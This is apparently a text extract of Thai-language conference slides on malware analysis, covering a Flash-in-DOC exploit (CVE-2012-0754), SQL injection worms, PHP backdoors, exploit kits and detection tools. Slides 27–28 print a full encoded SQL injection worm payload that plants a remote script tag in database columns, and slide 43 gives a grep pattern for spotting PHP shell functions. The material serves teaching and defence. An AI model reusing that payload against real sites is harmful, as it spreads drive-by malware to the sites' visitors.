advanced malware analysis
DESCRIPTION
TRANSCRIPT
“Is Your Privacy at Risk? Security and Privacy Challenges in the Digital Modernity”
www.cdicconference.com
1
ช ำแหละโปรแกรมไม่พงึประสงค์ ด้วยเทคนิคเหนือเมฆ
อ. ประธาน พงศ์ทิพย์ฤกษ์SANS GIAC GPEN, eCPPT, ECSA, CEH, CPTS, CIW Security Analyst, CWNA, CWSP, Security+, ITIL-F
Section Manager, Senior Information Security Consultant
ACIS Professional Center
2
Let’s Party Rock
Next Generation for Malware
Malware Analysis
Web Based Malware
Back to the Past
Back to the Future
Lab Challenge
2
“Is Your Privacy at Risk? Security and Privacy Challenges in the Digital Modernity”
www.cdicconference.com
3
Next Generation of Malware
4
Old Malware fashion
Executable file
Packer, Crypter => FUD just 1 Week !!
Spyware / Adware
Rogue Security Software
Virus / Worm
USB Autorun
4
5
Antivirus Detected
5
Gotcha !!
6
Virustotal
6
7
Virustotal – One Week later
7
8
Anubis: Analyzing Binary File
8
9
Latest Malware fashion
MS Office+Flash Player
PDF Reader
Mobile Application
Social Network Application
Web Browser Toolbar
Web based Malware
9
10
Bypassing Antivirus
10
Ninja Techniques
11
Malware Analysis
11
12
CVE-2012-0754: SWF in DOC
“Iran’s Oil and Nuclear Situation.doc” Contains flash instructing it to download and
Parse a malformed MP4.
OS Affect Adobe Flash Player before 10.3.183.15 and 11.x
Before 11.1.102.62 on Windows, Mac OS X, Linux
And Solaris
Mobile Affect Adobe Flash Player before 11.1.111.6 on
Android 2.x and 3.x and before 11.1.115.6 on
Android 4.x
12
13
Document Analysis
Decompiled Flash from file This.MyNS.play(“http://208.115.230.76/test.mp4”);
Whois – 208.115.230.76 208.115.230.76
76-230-115-208.static.reverse.lstn.net
Host reachable, 77 ms. average, 2 of 4 pings lost
208.115.192.0 - 208.115.255.255
Limestone Networks, Inc.
400 S. Akard Street
Suite 200
Dallas
TX
75202
United States
13
14
Process Monitor network log
14
15
Process Monitor network log
15
16
Traffic and C&C (us.exe)
16
17
Virus Analysis – us.exe
17
18
Target Analysis
Whois – 199.192.156.134 199.192.156.134
Host reachable, 89 ms. average
199.192.152.0 - 199.192.159.255
VPS21 LTD
38958 S FREMONT BLVD
FREMONT
CA
94536
United States
zou, jinhe
+1-408-205-7550
18
“Is Your Privacy at Risk? Security and Privacy Challenges in the Digital Modernity”
www.cdicconference.com
19
Web Based Malware
20
Back to the Past
20
21
Web Defacement
21
22
Zone-H
22
23
Ddos Tool
23
24
Hack 4 Fun and Profit
24
25
Back to the Future
25
26
About My Memory
2008 Oishi website was hacked without defacement
Kaspersky AV alert for “A little javascript file”
2009 SQL injection worms on MSSQL
Affect many Bank on Thailand
2010 Google and Firefox alert for malware website
Obfuscation JS to bypass AV
2011 Many website was blocked by Google Malware
26
27
SQL Injection Worms
27
';DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C0040004300200076006100720063006800610072002800320035003500290020004400450043004C0041005200450020005400610062006C0065005F0043007500720073006F007200200043005500520053004F005200200046004F0052002000730065006C00650063007400200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006F006D0020007300790073006F0062006A006500630074007300200061002C0073007900730063006F006C0075006D006E00730020006200200077006800650072006500200061002E00690064003D0062002E0069006400200061006E006400200061002E00780074007900700065003D00270075002700200061006E0064002000280062002E00780074007900700065003D003900390020006F007200200062002E00780074007900700065003D003300350020006F007200200062002E00780074007900700065003D0032003300310020006F007200200062002E00780074007900700065003D003100AS%20NVARCHAR(4000));EXEC(@S);--
28
SQL Injection Worms
28
';DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(D E C L A R E @ T v a r c h a r ( 2 5 5 ) , @ C v a r c h a r ( 2 5 5 ) D E C L A R E T a b l e _ C u r s o r C U R S O R F O R s e l e c t a . n a m e , b . n a m e f r o m s y s o b j e c t s a , s y s c o l u m n s b w h e r e a . i d = b . i d a n d a . x t y p e = ' u ' a n d ( b . x t y p e = 9 9 o r b . x t y p e = 3 5 o r b . x t y p e = 2 3 1 o r b . x t y p e = 1 6 7 ) O P E N T a b l e _ C u r s o r F E T C H N E X T F R O M T a b l e _ C u r s o r I N T O @ T , @ C W H I L E ( @ @ F E T C H _ S T A T U S = 0 ) B E G I N e x e c ( ' u p d a t e [ ' + @ T + ' ] s e t [ ' + @ C + ' ] = r t r i m ( c o n v e r t ( v a r c h a r , [ ' + @ C + ' ] ) ) + ' ' < s c r i p t s r c = h t t p : / / w w w . f e n g n i m a . c n / k . j s > < / s c r i p t > ' ' ' ) F E T C H N E X T F R O M T a b l e _ C u r s o r I N T O @ T , @ C E N D C L O S E T a b l e _ C u r s o r D E A L L O C A T E T a b l e _ C u r s o r undefined AS%20NVARCHAR(4000));EXEC(@S);--
29
Web Application Backdoor
29
30
Web Application Backdoor -FUD
30
31
Redbull.php (PHP Backdoor)
31
32
Insert Malicious JS into config.inc.php
32
33
Crimepack Exploit Kit
33
34
Crimeware Exploit Kit
34
35
Drive-By Download
34
Web Server
Malware Server
Web Server
Visit Malicious Website
Malicious JS execute
Redirect to Malware Server
Exploit Browser / Flash PlayerReverse Shell to Attacker
36
Google Malware Alert
35
37
Google Diagnostic
36
38
http://www.stopbadware.org/home/reviewinfo
37
39
http://sitecheck.sucuri.net/scanner
38
40
http://sucuri.net/malware/malware-entry-mwhta7
39
41
http://sucuri.net/malware/malware-entry-mwhta7
40
42
http://www.urlvoid.com
41
43
Detect Webserver Backdoor
42
Manual Source review
NeoPI – Neohapsis
PHP Shell Scanner
http://25yearsofprogramming.com/php/findmaliciouscode.htm
grep -RPl --include=*.{php,txt,asp} "(passthru|shell_exec|system|phpinfo|base64_decode|chmod|mkdir|fopen|fclose|readfile) *\(”
/var/www/
44
PHP Shell Scanner
43
45
Undetectable #1
44
46
Undetectable #2
45
47
JS De-Obfuscate Tool
46
Google Chrome Developer Tools Firebug (Firefox’s plugin) JSDebug (Firefox’s plugin) Javascript Deobfuscator (Firefox’s plugin) Malzilla Rhino SpiderMonkey
48
Simple JS Obfuscate
47
49
Simple JS Obfuscate
48
“Is Your Privacy at Risk? Security and Privacy Challenges in the Digital Modernity”
www.cdicconference.com
50
Lab Challenge